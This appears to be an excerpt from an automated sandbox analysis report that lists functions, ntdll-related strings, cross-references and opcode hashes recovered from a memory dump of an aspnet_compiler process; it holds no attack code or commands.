UseFilter, xrefs: 00F0A1C1
FilterFullPath, xrefs: 00F6C2E6

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 299364de862a37a2b813bcac81b26d58057be84acf0148885a7504a5a6fd3ff3
Instruction ID: 97ac2f6f7d696b68b27a48d0ea6a66305b077852e56b55f4d1504ad8b0fde952
Opcode Fuzzy Hash: 299364de862a37a2b813bcac81b26d58057be84acf0148885a7504a5a6fd3ff3
Instruction Fuzzy Hash: 06A17C71D016299BDB31DF64CC89BAAB7B8EF44710F1041EAE948A7250D7399E84EF90

Function 00F4909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

&, xrefs: 00F85CF8
@, xrefs: 00F49148
%, xrefs: 00F85D3F

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 3f31bdfa08d6b70b58a30eeb25bfc3f76f1f6126f35c607242ffb0c6987f0448
Instruction ID: 53990ede6bb244b253398ed2d9268cd9f1c79995bf30e4e57f0f90caf82ab636
Opcode Fuzzy Hash: 3f31bdfa08d6b70b58a30eeb25bfc3f76f1f6126f35c607242ffb0c6987f0448
Instruction Fuzzy Hash: 1D71D071A0C702AFC710DF24C980A6BBBE5BFC5728F108A1DF8A647241D7B0D905EB92

Function 00F0758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 00F6AFAB
Invalid address specified to %s( %p, %p ), xrefs: 00F6AFCB
HEAP: , xrefs: 00F6AFB8

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 08cd887912f896b06453189a3bfd684301921417d0c937876d96c92affbd261d
Instruction ID: 695f375fa17258b3bbf6167444903135ada9e7704eacb0b5c557900e78a14005
Opcode Fuzzy Hash: 08cd887912f896b06453189a3bfd684301921417d0c937876d96c92affbd261d
Instruction Fuzzy Hash: DD412471E04B808FDF39DA1DC4907B977A0AF01364F2840E9D4469B296D666EC85FF13

Function 00FCC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 00FCC1F1
PreferredUILanguages, xrefs: 00FCC212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00FCC1C5

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 30b7fc5e78ffacf637bebf29975a921e0111114a89bf7690897daec9cab70d62
Instruction ID: d1f84519c65e7a3485c629327a330ad8945faabcf1d84a14be35b7a055838683
Opcode Fuzzy Hash: 30b7fc5e78ffacf637bebf29975a921e0111114a89bf7690897daec9cab70d62
Instruction Fuzzy Hash: 92415272E0021AEBDF11DAD4C952FEEB7B8AB54710F14416EEA09F7280D7749E44EB90

Function 00FA4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 00FA4172
@, xrefs: 00FA4225
LdrpResValidateFilePath Enter, xrefs: 00FA4160

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: fbb76358900451362a1f951e214f99eca0c670b6b30e6f86af20d87d1ce70271
Instruction ID: 22fb089157e1ac309cf53ae81e0ef3114e7a618f4b2c103f44389e981134064a
Opcode Fuzzy Hash: fbb76358900451362a1f951e214f99eca0c670b6b30e6f86af20d87d1ce70271
Instruction Fuzzy Hash: 45412BB1D043588BDB22DB94CC407ADB7F4FF86354F240469E901EB782D7B8A941EB10

Function 00F1A2C3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 00F1A309
RtlpResUltimateFallbackInfo Enter, xrefs: 00F1A2FB
PS, xrefs: 00F1A348

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: PS$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-405261330
Opcode ID: 9d4cc17b061107a786d6acbb846e42ea64ba2c613e2f517fbb132b504271118b
Instruction ID: 932a807e8634da46f7def84ea43790008035a5f5f21562c048020c961f9299e2
Opcode Fuzzy Hash: 9d4cc17b061107a786d6acbb846e42ea64ba2c613e2f517fbb132b504271118b
Instruction Fuzzy Hash: 5A41E271E01659CBDB11CF69C840BAD77B4FF84720F2480A6E814DB291E37ADE80EB52

Function 00F433A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

RtlCreateActivationContext, xrefs: 00F829F9
SXS: %s() passed the empty activation context data, xrefs: 00F829FE
Actx , xrefs: 00F433AC

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 93d0d5138e0983a1a2f1b5813004e103c1131e11411e0baa0b8f9c89ab91c775
Instruction ID: 9ca9e222828de4f6896b7288464ef0f47a517fdf4750424c42921cc9dcd4d9d5
Opcode Fuzzy Hash: 93d0d5138e0983a1a2f1b5813004e103c1131e11411e0baa0b8f9c89ab91c775
Instruction Fuzzy Hash: 473121326003059FDB26EF68D881BE67BA4EF44720F154429FD04AF296DB39EE41E790

Function 00F9B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 00F9B632
GlobalFlag, xrefs: 00F9B68F
@, xrefs: 00F9B670

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 3ea2c9153733ca0bc854f7c2d4d8a6f935d336d542192043c5847daeaecfbeae
Instruction ID: 2839b20e682d49d2ff166bdd8bf300bb04c0aea79011e67360a95f1cd5e4cb49
Opcode Fuzzy Hash: 3ea2c9153733ca0bc854f7c2d4d8a6f935d336d542192043c5847daeaecfbeae
Instruction Fuzzy Hash: D2315EB1E00219AFEF10EF94DD81AEEBB78EF44744F0404A9EA05E7191D774AE44DBA4

Function 00F51270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 00F512A5
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00F5127B
BuildLabEx, xrefs: 00F5130F

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 276f77d57f37a7f6eacb1dac95c264d085216c244414301bc89ee0efcc267ef9
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 9031CF72A00519BBDB11AF94CC15FEEBBBDFB84710F104021FA04A71A0D774AA09EB60

Function 00F920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 00F92104
Process initialization failed with status 0x%08lx, xrefs: 00F920F3
LdrpInitializationFailure, xrefs: 00F920FA

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: d241ca11acc5d04bc061cec7e5ff605fa21bdb68b9c270a9306093e7ed6a7088
Instruction ID: a2421424aa388b45a44ea840a17eb6b97ba1567d6c3270d4c45b09afb6d52591
Opcode Fuzzy Hash: d241ca11acc5d04bc061cec7e5ff605fa21bdb68b9c270a9306093e7ed6a7088
Instruction Fuzzy Hash: FEF0C831A4034CBFEB35E748CC43FA53768FB40B64F100059F7447B282D6B5A990D691

Function 00F203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00F74D8A

Strings

#%u, xrefs: 00F74D82

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 3b4e0134c364244ae6078fd48baf42b359c3df48bd6ecbb614c9947878ae6772
Instruction ID: 2eef6f6625ed1cc8074f919aad26e2005609b969b30485bedaaf684123999e69
Opcode Fuzzy Hash: 3b4e0134c364244ae6078fd48baf42b359c3df48bd6ecbb614c9947878ae6772
Instruction Fuzzy Hash: 8A716872E0010A9FDB01DFA8D981BAEB7F8BF08714F144065E905E7252EB38EE01DB61

Function 00F252A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 00F255A3
@, xrefs: 00F25445

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 4ef1a40bcd20a8a99425f7205a38d8b53f744c4bc772e19e5ae5a404fdf4c686
Instruction ID: 8d25b4a2a86f5f40ffb6616d9191582b40e62ff8e7b9eb0127167822bd5b0e5b
Opcode Fuzzy Hash: 4ef1a40bcd20a8a99425f7205a38d8b53f744c4bc772e19e5ae5a404fdf4c686
Instruction Fuzzy Hash: 4832BE71908B218BCB24CF14D490B7EB7E1EF88B60F54891EF9859B290E774DD84EB52

Function 00FDA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 00FDA551
`, xrefs: 00FDA44B

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 967028d2d96c1dfeac4c405046dfa574c5f24e69dd449b038d23b69ef464eabc
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: ADC1F1326043429BDB25CF24C841B6BBBE6AFC4324F1C4A2EF595CA391D778D905EB46

Function 00F104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F1063D
kLsE, xrefs: 00F10540

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: ce239191adb956dd11f28e6f9dc200051259c73249e026a87e46f193022ac032
Instruction ID: 5e962d99f1659e41da88bf27716b25d2862e2cb1f30a9a5a3ee469905e51b608
Opcode Fuzzy Hash: ce239191adb956dd11f28e6f9dc200051259c73249e026a87e46f193022ac032
Instruction Fuzzy Hash: 1351CE719047468BC724EF25C5406E7B7E5AF84314F04483EE9DA87241EBB4E9C5DF92

Function 00FA35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 00FA35EC
LdrResGetRCConfig Exit, xrefs: 00FA35FE

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 0339d36fce958b6edc71e696c6da82b87b38b30aa92ca80970c99a45c46d460d
Instruction ID: 1e782fad49df7cb74a4eb166c9d1c176cab93d0663bca5d6d4b3d6305f41a4e7
Opcode Fuzzy Hash: 0339d36fce958b6edc71e696c6da82b87b38b30aa92ca80970c99a45c46d460d
Instruction Fuzzy Hash: B63103B2608745ABD311DF68D845F2AB3E4EF86724F040869F850CB3D1EB38DA05DB92

Function 00F434B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 00F82A95
RtlpInitializeAssemblyStorageMap, xrefs: 00F82A90

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: f8ffee2bbd0bfe96cb1d4385a8a42c816ec8b4fd7bdc16268c4a48ce5e973d37
Instruction ID: fc5178288046bf6d8bbddb0520649872d432ba851a3521db93db29b0b312f70d
Opcode Fuzzy Hash: f8ffee2bbd0bfe96cb1d4385a8a42c816ec8b4fd7bdc16268c4a48ce5e973d37
Instruction Fuzzy Hash: 5E110072F05214BBF725DA48CD42FBB76A99F94B54F1580297E04EB290E678DE00A790

Function 00F4A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 00F4A5E4
Threadpool!, xrefs: 00F4A5E9

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 83d65440fb221f05dc2e482c698494e54240b7f45bc4ada335163e8d03a46b98
Instruction ID: b57646da080f1df16dff8c6d1622debcf8db74d824bb164ee7847895dc5efc33
Opcode Fuzzy Hash: 83d65440fb221f05dc2e482c698494e54240b7f45bc4ada335163e8d03a46b98
Instruction Fuzzy Hash: 830144B2280744EFD311CF14CD06F127BE8E744719F058939BA58C7180E739D804DB4A

Function 00F6739A Relevance: 2.0, Strings: 1, Instructions: 705COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00F67449

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: ribeWnfStateChange
API String ID: 0-1432052543
Opcode ID: f1c462e275fd38ffc8af30c2542f3478d7fdfc65a9093cee98c865675c14bd48
Instruction ID: 5757b0a9977145f887f1b99e9a75622b5636053547d2202f9d175c9ba61d6abb
Opcode Fuzzy Hash: f1c462e275fd38ffc8af30c2542f3478d7fdfc65a9093cee98c865675c14bd48
Instruction Fuzzy Hash: 78429171E047168FDB14DF59C8806AEB7B2FF88328B28815DE452AB350DB35EC41DB90

Function 00FBA118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00FBA127

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: ribeWnfStateChange
API String ID: 0-1432052543
Opcode ID: 9e4763e72728119e9056a60401f42400db7fc8ddb39ca2233616e4b968fdee78
Instruction ID: c9c5e1cd3ffff5510437cdcbdc0e27f9568504a3b2d4ac899d11b79720374d6f
Opcode Fuzzy Hash: 9e4763e72728119e9056a60401f42400db7fc8ddb39ca2233616e4b968fdee78
Instruction Fuzzy Hash: DF22E275A046508FDB25CF2AC0543F2B7F1AF44310F28849AE8968F286E775D952FF62

Function 00F17370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4162a9b9727b44b9c0b8e1615be987881f9c2e051af29cacc3037d87fb6b81a
Instruction ID: cacecb92ac197dd7d3818008dbf33437f365f1cff082c4722c670a5a8220975f
Opcode Fuzzy Hash: f4162a9b9727b44b9c0b8e1615be987881f9c2e051af29cacc3037d87fb6b81a
Instruction Fuzzy Hash: 51A17F71A08741CFC320DF28D480A6ABBF6BF98314F24496EF58997351D734E985DB92

Function 00F3E5E7 Relevance: 1.5, Strings: 1, Instructions: 278COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00F3E6B3, 00F3E6C6, 00F3E6D3

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: ribeWnfStateChange
API String ID: 0-1432052543
Opcode ID: 9658c0e6c6bf9dc6e35140b522e41606b5ebde735458a7ce39990613de3b76a9
Instruction ID: 2f772a7f8da5b3fc55c914d689a145c61a2d07fb80eae5fe3bdd6278b3f97a49
Opcode Fuzzy Hash: 9658c0e6c6bf9dc6e35140b522e41606b5ebde735458a7ce39990613de3b76a9
Instruction Fuzzy Hash: AFA13871E006189FEB22DB58CC45FAEB7B4AF04734F154122EA14AB2D1D7789D44EBD2

Function 00F9035C Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00F90466, 00F9059C

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: ribeWnfStateChange
API String ID: 0-1432052543
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: ab9ce98939051bd774feb0a071d5522a2e23db31940ef69bb630d6bbc83e0ad2
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: DA719D71E00619AFDF10DFA8C981EAEBBB8FF88310F144469E505E7291DB38EA41DB50

Function 00FD92A6 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00FD93F0

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: ribeWnfStateChange
API String ID: 0-1432052543
Opcode ID: 025e6ed21c05bd35ee3f0108e1af9da43cc382233a8f559b0f30044a2b055bbf
Instruction ID: e2f58eb300c44edac831b327d952ea565b5dce3f6868ac5f71b30572ead3fa81
Opcode Fuzzy Hash: 025e6ed21c05bd35ee3f0108e1af9da43cc382233a8f559b0f30044a2b055bbf
Instruction Fuzzy Hash: 3461093260C7418BD311CFA4C855B6AB7E6BF80314F1C446EE8858B382DBB9EC06E781

Function 00FCB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 00FCB28F

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: a400044977238b13238ba89695274ece4d09471a6b4dc013fac52852ec59a185
Instruction ID: f581272d25ed65c2d3a84a0ef16f9504809f47cc51194c5ddc6eb5fa70f76c7b
Opcode Fuzzy Hash: a400044977238b13238ba89695274ece4d09471a6b4dc013fac52852ec59a185
Instruction Fuzzy Hash: 0241D47AD0025AABCF11DA94CD43FEEB7B9AF44720F15012AE901EB290D734DE40E7A0

Function 00FB705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 00FB70A4

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: 68dd0f91947c9813af01a166029be443da1265a8862e8ff311c2c0c98fc94834
Instruction ID: 31e35be38347e0fe591ad2b18898e3cfa89e1b47670ecd543c43a7053aa87c93
Opcode Fuzzy Hash: 68dd0f91947c9813af01a166029be443da1265a8862e8ff311c2c0c98fc94834
Instruction Fuzzy Hash: DD41693190435146E732BB79EC46BE93B95AB80764F14052AFDD08B1C6CB7F48C6EBA0

Function 00F47505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 00F84622

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: dc4502b485def7d6f58df312c274084752c390aa99be1440ce93a024a07e543e
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: 5941A076A046169BCF21EF44C890BBEBBB5EF45711F14405AED45AB200DB34ED41EBE1

Function 00F4329E Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 00F4330D

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: bcd2e4796b996d7f91902760bb5da8b80c0ec1922534ae50d504e1c5b46e4018
Instruction ID: d6511f8d4fab7f32933cccbad27292d22ee6011e129f6b2db7674640230283fe
Opcode Fuzzy Hash: bcd2e4796b996d7f91902760bb5da8b80c0ec1922534ae50d504e1c5b46e4018
Instruction Fuzzy Hash: C93190B25483049FD321DF28C881A6BBFE8FB85764F50092EF99583250DA35DE04AB92

Function 00F192C5 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

ribeWnfStateChange, xrefs: 00F192D4

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: ribeWnfStateChange
API String ID: 0-1432052543
Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
Instruction ID: 75f2c79365882148a92b559ba8bd4825dd5e08f247239b398125520ecb4cf3b5
Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
Instruction Fuzzy Hash: F931ABB26082098FCB01DF18D840A9ABBE9FF89350F00056AFC55D73A1DB34DD45EBA2

Function 00F15096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 00F150BF

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: ec9233e9e732af1e1a9cd7bafcbf2b398bf328cbd285ee4706c0b1bd9315c869
Instruction ID: ee5af0630a0b1b9f7aa8bc2f621b8cbea7b3d3468f44f4c2a8b1e3790c267a90
Opcode Fuzzy Hash: ec9233e9e732af1e1a9cd7bafcbf2b398bf328cbd285ee4706c0b1bd9315c869
Instruction Fuzzy Hash: B3117F32B08E13DBDB29495D88507E6B295EBD9B34F35812AE462DB290D672DCC1B381

Function 00F3B2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9779b520b701df5b7063a146b8957b7be7c4bdc7f3f43ff56ae35d2a6968a727
Instruction ID: da7dd4b059d1f86dc7d0560f869ddcbea0f9b8e0de69fd428c603e2aaa1ba846
Opcode Fuzzy Hash: 9779b520b701df5b7063a146b8957b7be7c4bdc7f3f43ff56ae35d2a6968a727
Instruction Fuzzy Hash: 1932C272E00219DBCF14CF98D8A1BAEBBB1FF44724F18406AE905AB391E7359D11DB91

Function 00F165D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd31ecbcd6b78dccf236c37f1028afa4ec3c12f8f0c4c19c486d3ffd99fc655f
Instruction ID: d4a3f5561b7b7e759829a29526e780adaec0f14fc3b9e0b50dd2acf2c3703a40
Opcode Fuzzy Hash: bd31ecbcd6b78dccf236c37f1028afa4ec3c12f8f0c4c19c486d3ffd99fc655f
